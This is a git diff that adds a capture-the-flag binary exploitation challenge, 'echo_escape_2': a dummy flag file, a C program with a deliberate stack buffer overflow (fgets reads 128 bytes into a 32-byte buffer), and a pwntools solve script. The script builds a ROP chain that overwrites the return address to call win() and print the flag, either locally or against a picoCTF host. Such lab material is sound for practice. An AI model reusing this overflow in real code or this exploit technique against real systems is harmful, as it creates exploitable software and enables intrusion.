diff --git a/pwn/echo_escape_2/flag.txt b/pwn/echo_escape_2/flag.txt new file mode 100644 index 0000000..7f34d3c --- /dev/null +++ b/pwn/echo_escape_2/flag.txt @@ -0,0 +1 @@ +picoCTF{dummy} diff --git a/pwn/echo_escape_2/solve.py b/pwn/echo_escape_2/solve.py new file mode 100755 index 0000000..17034d0 --- /dev/null +++ b/pwn/echo_escape_2/solve.py @@ -0,0 +1,33 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])" + +from pwn import * + +exe = ELF("./vuln") + +context.binary = exe + +ADDR, PORT, *_ = "dolphin-cove.picoctf.net 56430".split() + +def conn(): + if args.REMOTE: + r = remote(ADDR, PORT) + else: + r = process([exe.path]) + + return r + +def main(): + r = conn() + r.recvuntil(b'Enter the secret key: ').decode() + + offset = 0x2C + rop = ROP(exe) + rop.raw(rop.generatePadding(0, offset)) + rop.win() + r.sendline(rop.chain()) + print(r.recvline_contains(b'picoCTF').decode()) + r.close() + +if __name__ == "__main__": + main() diff --git a/pwn/echo_escape_2/vuln b/pwn/echo_escape_2/vuln new file mode 100755 index 0000000..63a9450 Binary files /dev/null and b/pwn/echo_escape_2/vuln differ diff --git a/pwn/echo_escape_2/vuln.c b/pwn/echo_escape_2/vuln.c new file mode 100644 index 0000000..a559bf9 --- /dev/null +++ b/pwn/echo_escape_2/vuln.c @@ -0,0 +1,34 @@ +#include +#include +#include + +void win() { + FILE *fp = fopen("flag.txt", "r"); + if (!fp) { + perror("[!] Could not open flag.txt"); + exit(1); + } + + char flag[128]; + fgets(flag, sizeof(flag), fp); + printf("Flag: %s\n", flag); + fflush(stdout); + fclose(fp); +} + +void vuln() { + char buf[32]; + + printf("Enter the secret key: "); + fflush(stdout); + + fgets(buf, 128, stdin); + + printf("You entered:, %s\n", buf); +} + +int main() { + vuln(); + puts("Goodbye!"); + return 0; +}